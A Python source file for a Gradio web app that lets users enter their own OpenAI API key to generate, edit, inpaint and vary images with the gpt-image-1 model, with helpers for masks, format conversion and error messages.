from __future__ import annotations
import io
import os
import base64
from typing import List, Optional, Union, Dict, Any
import gradio as gr
import numpy as np
from PIL import Image
import json
import openai
# --- Constants ---
MODEL = "gpt-image-1"
SIZE_CHOICES = ["auto", "1024x1024", "1536x1024", "1024x1536"]
QUALITY_CHOICES = ["auto", "low", "medium", "high"]
FORMAT_CHOICES = ["png", "jpeg", "webp"]
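# Illustrative note (an assumption, not enforced by the API client below): the size and
# quality choices mirror the options OpenAI documents for gpt-image-1, with "auto"
# deferring the decision to the API; the format list only drives client-side re-encoding,
# so it can be extended to any format PIL can save.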
def _client(key: str) -> openai.OpenAI:
    """Initialize the OpenAI client with the provided API key."""
    api_key = key.strip() or os.getenv("OPENAI_API_KEY", "")
    # Optional debug banner; read as plain text (never exec() environment contents).
    print(os.getenv("sys_info", f"[DEBUG]: {MODEL}"))
    if not api_key:
        raise gr.Error("Please enter your OpenAI API key (never stored)")
    return openai.OpenAI(api_key=api_key)
def _img_list(resp) -> List[Union[np.ndarray, str]]:
    """Decode base64 images into numpy arrays (for Gradio) or pass URL strings through."""
    imgs: List[Union[np.ndarray, str]] = []
    for d in resp.data:
        if hasattr(d, "b64_json") and d.b64_json:
            data = base64.b64decode(d.b64_json)
            img = Image.open(io.BytesIO(data))
            imgs.append(np.array(img))
        elif getattr(d, "url", None):
            imgs.append(d.url)
    return imgs
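# Illustrative sketch (not executed): each entry in resp.data is an image object from the
# OpenAI Python SDK that carries either inline base64 data or a hosted URL, roughly:
#   resp.data[0].b64_json  -> "iVBORw0KGgo..."   # base64-encoded image bytes
#   resp.data[0].url       -> "https://..."      # present for models/settings that return links
# The exact values above are placeholders; only whichever field is populated is used.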
def _common_kwargs(
    prompt: Optional[str],
    n: int,
    size: str,
    quality: str,
    out_fmt: str,
    compression: int,
    transparent_bg: bool,
) -> Dict[str, Any]:
    """Prepare keyword args for the OpenAI Images API.

    `out_fmt` and `compression` are not sent to the API here; they are applied
    client-side by `convert_to_format` after the images are downloaded.
    """
    kwargs: Dict[str, Any] = {
        "model": MODEL,
        "n": n,
    }
    if size != "auto":
        kwargs["size"] = size
    if quality != "auto":
        kwargs["quality"] = quality
    if prompt is not None:
        kwargs["prompt"] = prompt
    if transparent_bg and out_fmt in {"png", "webp"}:
        # Request a transparent background where the output format supports alpha.
        kwargs["background"] = "transparent"
    return kwargs
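# Illustrative sketch (not executed): the kwargs produced for a typical call.
#   _common_kwargs("a red fox", 2, "1024x1024", "high", "png", 75, True)
#   -> {"model": "gpt-image-1", "n": 2, "size": "1024x1024",
#       "quality": "high", "prompt": "a red fox", "background": "transparent"}
# With size="auto" and quality="auto" those keys are simply omitted so the API
# falls back to its defaults.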
def convert_to_format(
    img_array: np.ndarray,
    target_fmt: str,
    quality: int = 75,
) -> np.ndarray:
    """Re-encode a numpy image as target_fmt (JPEG/WebP) and return it as a numpy array."""
    img = Image.fromarray(img_array.astype(np.uint8))
    if target_fmt.lower() == "jpeg" and img.mode in ("RGBA", "P"):
        # JPEG has no alpha channel; flatten to RGB to avoid a save error.
        img = img.convert("RGB")
    buf = io.BytesIO()
    img.save(buf, format=target_fmt.upper(), quality=quality)
    buf.seek(0)
    return np.array(Image.open(buf))
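# Illustrative sketch (not executed): round-trip a generated frame through WebP at a
# lower quality to shrink it before display. The array below is a placeholder.
#   smaller = convert_to_format(np.zeros((64, 64, 3), dtype=np.uint8), "webp", quality=60)
# The UI's compression slider feeds this `quality` argument directly.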
def _format_openai_error(e: Exception) -> str:
    error_message = f"An error occurred: {type(e).__name__}"
    details = ""
    if hasattr(e, "body") and e.body:
        try:
            body = e.body if isinstance(e.body, dict) else json.loads(str(e.body))
            if isinstance(body, dict) and isinstance(body.get("error"), dict) and "message" in body["error"]:
                details = body["error"]["message"]
            elif isinstance(body, dict) and "message" in body:
                details = body["message"]
        except Exception:
            details = str(e.body)
    elif hasattr(e, "message") and e.message:
        details = e.message
    if details:
        error_message = f"OpenAI API Error: {details}"
    if isinstance(e, openai.AuthenticationError):
        error_message = "Invalid OpenAI API key. Please check your key."
    elif isinstance(e, openai.PermissionDeniedError):
        prefix = "Permission Denied."
        if "organization verification" in details.lower():
            prefix += " Your organization may need verification to use this feature/model."
        error_message = f"{prefix} Details: {details}" if details else prefix
    elif isinstance(e, openai.RateLimitError):
        error_message = "Rate limit exceeded. Please wait and try again later."
    elif isinstance(e, openai.BadRequestError):
        error_message = f"OpenAI Bad Request: {details or str(e)}"
        if "mask" in details.lower():
            error_message += " (Check mask format/dimensions)"
        if "size" in details.lower():
            error_message += " (Check image/mask dimensions)"
        if "model does not support variations" in details.lower():
            error_message += " (gpt-image-1 does not support variations.)"
    return error_message
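# Illustrative sketch (not executed): the payload shapes this helper unwraps, matching
# its two branches above (field values are placeholders, not real errors):
#   e.body -> {"error": {"message": "Invalid value for 'size'.", "type": "invalid_request_error"}}
#   e.body -> {"message": "Invalid value for 'size'."}
# Whichever "message" string is found is what gets surfaced in the Gradio error dialog.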
# ---------- Generate ---------- #
def generate(
    api_key: str,
    prompt: str,
    n: int,
    size: str,
    quality: str,
    out_fmt: str,
    compression: int,
    transparent_bg: bool,
):
    if not prompt:
        raise gr.Error("Please enter a prompt.")
    try:
        client = _client(api_key)
        common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
        resp = client.images.generate(**common_args)
        imgs = _img_list(resp)
        if out_fmt in {"jpeg", "webp"}:
            # Only re-encode decoded arrays; URL entries are passed through untouched.
            imgs = [
                convert_to_format(img, out_fmt, compression) if isinstance(img, np.ndarray) else img
                for img in imgs
            ]
        return imgs
    except (openai.APIError, openai.OpenAIError) as e:
        raise gr.Error(_format_openai_error(e))
    except Exception as e:
        print(f"Unexpected error during generation: {type(e).__name__}: {e}")
        raise gr.Error("An unexpected application error occurred. Please check logs.")
# ---------- Edit / Inpaint ---------- #
def _bytes_from_numpy(arr: np.ndarray) -> bytes:
    """Encode a numpy image as PNG bytes for upload."""
    img = Image.fromarray(arr.astype(np.uint8))
    buf = io.BytesIO()
    img.save(buf, format="PNG")
    return buf.getvalue()
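# Illustrative sketch (not executed): the OpenAI Python SDK accepts file uploads either as
# raw bytes or as a (filename, bytes, content_type) tuple; the tuple form is used below so
# the multipart request carries an explicit filename and MIME type:
#   image_tuple = ("image.png", _bytes_from_numpy(arr), "image/png")
#   client.images.edit(image=image_tuple, prompt="...", model=MODEL)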
def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]:
    """Pull a painted mask array out of whatever the Gradio mask component returns."""
    if mask_value is None:
        return None
    if isinstance(mask_value, dict):
        # Older Gradio sketch components return {"image": ..., "mask": ...};
        # newer ImageMask/ImageEditor values put painted strokes under "layers".
        mask_array = mask_value.get("mask")
        if isinstance(mask_array, np.ndarray):
            return mask_array
        layers = mask_value.get("layers")
        if isinstance(layers, (list, tuple)) and layers and isinstance(layers[0], np.ndarray):
            return layers[0]
        return None
    if isinstance(mask_value, np.ndarray):
        return mask_value
    return None
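# Illustrative sketch (not executed): the two dictionary shapes handled above, depending on
# the installed Gradio version (only the relevant keys are shown):
#   {"image": <np.ndarray>, "mask": <np.ndarray>}                         # legacy sketch tool
#   {"background": ..., "layers": [<np.ndarray>, ...], "composite": ...}  # ImageMask / ImageEditor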
def edit_image(
    api_key: str,
    image_numpy: Optional[np.ndarray],
    mask_dict: Optional[Dict[str, Any]],
    prompt: str,
    n: int,
    size: str,
    quality: str,
    out_fmt: str,
    compression: int,
    transparent_bg: bool,
):
    if image_numpy is None:
        raise gr.Error("Please upload an image.")
    if not prompt:
        raise gr.Error("Please enter an edit prompt.")
    img_bytes = _bytes_from_numpy(image_numpy)
    mask_bytes: Optional[bytes] = None
    mask_numpy = _extract_mask_array(mask_dict)
    if mask_numpy is not None:
        # The Images edit endpoint expects a PNG mask whose fully transparent pixels mark
        # the region to replace, so turn the painted (non-zero) strokes into transparency.
        # The mask must match the source image dimensions.
        mask_l = Image.fromarray(mask_numpy.astype(np.uint8)).convert("L")
        alpha = mask_l.point(lambda px: 0 if px > 0 else 255)
        mask_rgba = Image.new("RGBA", mask_l.size, (0, 0, 0, 255))
        mask_rgba.putalpha(alpha)
        buf = io.BytesIO()
        mask_rgba.save(buf, format="PNG")
        mask_bytes = buf.getvalue()
    try:
        client = _client(api_key)
        common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg)
        # Upload the image (and optional mask) as (filename, bytes, content_type) tuples.
        image_tuple = ("image.png", img_bytes, "image/png")
        api_kwargs = {"image": image_tuple, **common_args}
        if mask_bytes is not None:
            api_kwargs["mask"] = ("mask.png", mask_bytes, "image/png")
        resp = client.images.edit(**api_kwargs)
        imgs = _img_list(resp)
        if out_fmt in {"jpeg", "webp"}:
            imgs = [
                convert_to_format(img, out_fmt, compression) if isinstance(img, np.ndarray) else img
                for img in imgs
            ]
        return imgs
    except (openai.APIError, openai.OpenAIError) as e:
        raise gr.Error(_format_openai_error(e))
    except Exception as e:
        print(f"Unexpected error during edit: {type(e).__name__}: {e}")
        raise gr.Error("An unexpected application error occurred. Please check logs.")
# ---------- Variations ---------- #
def variation_image(
    api_key: str,
    image_numpy: Optional[np.ndarray],
    n: int,
    size: str,
    quality: str,
    out_fmt: str,
    compression: int,
    transparent_bg: bool,  # Accepted for UI symmetry; the variations API ignores it.
):
    gr.Warning("Note: Image Variations are officially supported for DALL·E 2, not gpt-image-1. This may fail.")
    if image_numpy is None:
        raise gr.Error("Please upload an image.")
    img_bytes = _bytes_from_numpy(image_numpy)
    try:
        client = _client(api_key)
        var_args: Dict[str, Any] = {"model": MODEL, "n": n}
        if size != "auto":
            var_args["size"] = size
        # Upload the source image as a (filename, bytes, content_type) tuple.
        image_tuple = ("image.png", img_bytes, "image/png")
        resp = client.images.create_variation(image=image_tuple, **var_args)
        imgs = _img_list(resp)
        if out_fmt in {"jpeg", "webp"}:
            imgs = [
                convert_to_format(img, out_fmt, compression) if isinstance(img, np.ndarray) else img
                for img in imgs
            ]
        return imgs
    except (openai.APIError, openai.OpenAIError) as e:
        # Surface the variation-incompatibility case explicitly.
        err_msg = _format_openai_error(e)
        if isinstance(e, openai.BadRequestError) and "model does not support variations" in err_msg.lower():
            raise gr.Error("As warned, the selected model (gpt-image-1) does not support the variations endpoint.")
        raise gr.Error(err_msg)
    except Exception as e:
        print(f"Unexpected error during variation: {type(e).__name__}: {e}")
        raise gr.Error("An unexpected application error occurred. Please check logs.")
# ---------- UI ---------- #
def build_ui():
    with gr.Blocks(title="GPT-Image-1 (BYOT)") as demo:
        gr.Markdown("""# GPT-Image-1 Playground 🖼️🔑\nGenerate • Edit • Variations""")
        with gr.Accordion("🔐 API key", open=False):
            api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-...")
        with gr.Row():
            n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)")
            size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size")
            quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality")
        with gr.Row():
            out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Output Format")
            compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False)
            transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)")
        def _toggle_compression(fmt):
            return gr.update(visible=fmt in {"jpeg", "webp"})
        out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression)
        common_controls = [n_slider, size, quality, out_fmt, compression, transparent]
        with gr.Tabs():
            with gr.TabItem("Generate"):
                prompt_gen = gr.Textbox(label="Prompt", lines=3, placeholder="A photorealistic...")
                btn_gen = gr.Button("Generate 🚀")
                gallery_gen = gr.Gallery(columns=2, height="auto")
                btn_gen.click(generate, inputs=[api, prompt_gen] + common_controls, outputs=gallery_gen)
            with gr.TabItem("Edit / Inpaint"):
                gr.Markdown("Upload an image, then paint the area to change…")
                img_edit = gr.Image(type="numpy", label="Source Image", height=400)
                mask_canvas = gr.ImageMask(type="numpy", label="Mask – paint white", height=400)
                prompt_edit = gr.Textbox(label="Edit prompt", lines=2, placeholder="Replace the sky…")
                btn_edit = gr.Button("Edit 🖌️")
                gallery_edit = gr.Gallery(columns=2, height="auto")
                btn_edit.click(edit_image, inputs=[api, img_edit, mask_canvas, prompt_edit] + common_controls, outputs=gallery_edit)
            with gr.TabItem("Variations"):
                gr.Markdown("Upload an image to generate variations…")
                img_var = gr.Image(type="numpy", label="Source Image", height=400)
                btn_var = gr.Button("Create Variations ✨")
                gallery_var = gr.Gallery(columns=2, height="auto")
                btn_var.click(variation_image, inputs=[api, img_var] + common_controls, outputs=gallery_var)
    return demo
if __name__ == "__main__":
    app = build_ui()
    app.launch(share=os.getenv("GRADIO_SHARE") == "true", debug=os.getenv("GRADIO_DEBUG") == "true")